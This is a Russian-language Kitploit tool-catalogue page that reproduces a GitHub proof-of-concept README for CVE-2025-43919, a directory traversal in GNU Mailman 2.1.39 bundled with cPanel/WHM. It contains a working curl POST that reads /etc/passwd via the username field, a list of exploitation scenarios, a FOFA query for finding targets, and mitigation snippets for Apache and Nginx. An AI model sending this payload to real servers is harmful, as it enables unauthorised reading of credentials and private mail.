Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-43919-POC — Обнаружена новая уязвимость в GNU Mailman 2.1.39, поставляемом вместе с cPanel/WHM, позволяющая неаутентифицированным удалённым злоумышленникам читать произвольные файлы на сервере через дефект обхода каталогов. | Kitploit
Инструменты/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

Обнаружена новая уязвимость в GNU Mailman 2.1.39, поставляемом вместе с cPanel/WHM, позволяющая неаутентифицированным удалённым злоумышленникам читать произвольные файлы на сервере через дефект обхода каталогов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1111 год назадЕщё не проверено

🚨 CVE-2025-43919: Обход каталога в GNU Mailman 2.1.39 (cPanel/WHM)

В GNU Mailman 2.1.39, поставляемом с cPanel/WHM, обнаружена новая уязвимость, позволяющая неавторизованным удалённым злоумышленникам читать произвольные файлы на сервере через обход каталога.

📌 Сводка по уязвимости:

  • Тип: Directory Traversal (без аутентификации)
  • Компонент: CGI-скрипт private.py
  • Затронутый эндпоинт: /mailman/private/mailman
  • Воздействие: раскрытие таких файлов, как /etc/passwd, .mbox archives и Mailman configs
  • Оценка CVSS: 5.8 (Medium)
  • ID CVE: CVE-2025-43919

Статус: официального исправления нет (Mailman 2.1.x — EOL)

🔥 PoC:

root@kitploit:~
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 Сценарии эксплуатации:

  • Слить /etc/passwd, configs или mailbox files
  • Раскрыть учётные данные и чувствительные архивы
  • Скомбинировать с другими багами для RCE или повышения привилегий

🛡️ Меры по смягчению: Заблокируйте доступ к /mailman/private на уровне веб-сервера:

root@kitploit:~
<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

Или в Nginx:

root@kitploit:~
location /mailman/private {
    deny all;
    return 403;
}

⬆️ Переходите на Mailman 3.x — 2.x — EOL и не имеет современных средств защиты

🔍 Поисковый запрос FOFA : app="Mailman"

📚 Узнавайте больше, делитесь ответственно и держите свою инфраструктуру в безопасности.

🔒 Подписывайтесь на новые реальные CVE, PoC и советы по укреплению защиты: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

Скачать инструмент